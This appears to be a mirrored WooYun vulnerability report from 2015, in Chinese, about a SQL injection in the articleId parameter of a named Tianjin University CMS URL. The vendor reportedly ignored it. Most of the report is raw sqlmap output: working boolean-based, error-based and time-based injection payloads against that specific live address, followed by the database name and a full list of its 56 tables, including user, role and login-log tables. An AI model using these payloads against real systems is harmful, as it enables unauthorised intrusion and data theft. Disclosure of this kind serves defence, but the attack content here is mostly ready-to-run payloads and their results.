乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-23: 细节已通知厂商并且等待厂商处理中 2015-11-28: 厂商已经主动忽略漏洞,细节向公众公开
http://cs973.tju.edu.cn/cmsstat/count?1=1&articleId=1&columnId=4028817a3c03fc4a013c09fe2039002b&time=1448243322946
sqlmap resumed the following injection point(s) from stored session:---Parameter: articleId (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: 1=1&articleId=1' AND 7571=7571 AND 'xhJY'='xhJY&columnId=4028817a3c03fc4a013c09fe2039002b&time=1448243322946 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: 1=1&articleId=1' AND (SELECT 2588 FROM(SELECT COUNT(*),CONCAT(0x71626b7671,(SELECT (ELT(2588=2588,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'sVZQ'='sVZQ&columnId=4028817a3c03fc4a013c09fe2039002b&time=1448243322946 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: 1=1&articleId=1' AND (SELECT * FROM (SELECT(SLEEP(5)))AhGg) AND 'uVPB'='uVPB&columnId=4028817a3c03fc4a013c09fe2039002b&time=1448243322946---web application technology: Apache, JSPback-end DBMS: MySQL 5.0Database: cms_tdjsjxy_dev[56 tables]+---------------------------+| qrtz_blob_triggers || qrtz_calendars || qrtz_cron_triggers || qrtz_fired_triggers || qrtz_job_details || qrtz_job_listeners || qrtz_locks || qrtz_paused_trigger_grps || qrtz_scheduler_state || qrtz_simple_triggers || qrtz_trigger_listeners || qrtz_triggers || t_ad || t_ad_page || t_bbs_reply || t_bbs_subject || t_bbs_user || t_cms_article || t_cms_article_recommend || t_cms_base_page || t_cms_base_panel || t_cms_base_site_templet || t_cms_catalog || t_cms_catalog_crawl || t_cms_frame || t_cms_page || t_cms_panel || t_cms_rss || t_cms_rule || t_cms_seo || t_cms_site || t_cms_site_version_backup || t_cms_stat || t_cms_style || t_cms_templet || t_db_bak || t_email || t_file_upload || t_guest_book || t_link || t_login_log || t_menu || t_menu_role || t_org || t_publish || t_research || t_resource_article || t_resource_file || t_resource_fold || t_role || t_survey || t_survey_option || t_survey_subject || t_sys_dic || t_user_role || t_users |+---------------------------+
危害等级:无影响厂商忽略
忽略时间:2015-11-28 19:28
漏洞Rank:4 (WooYun评价)
暂无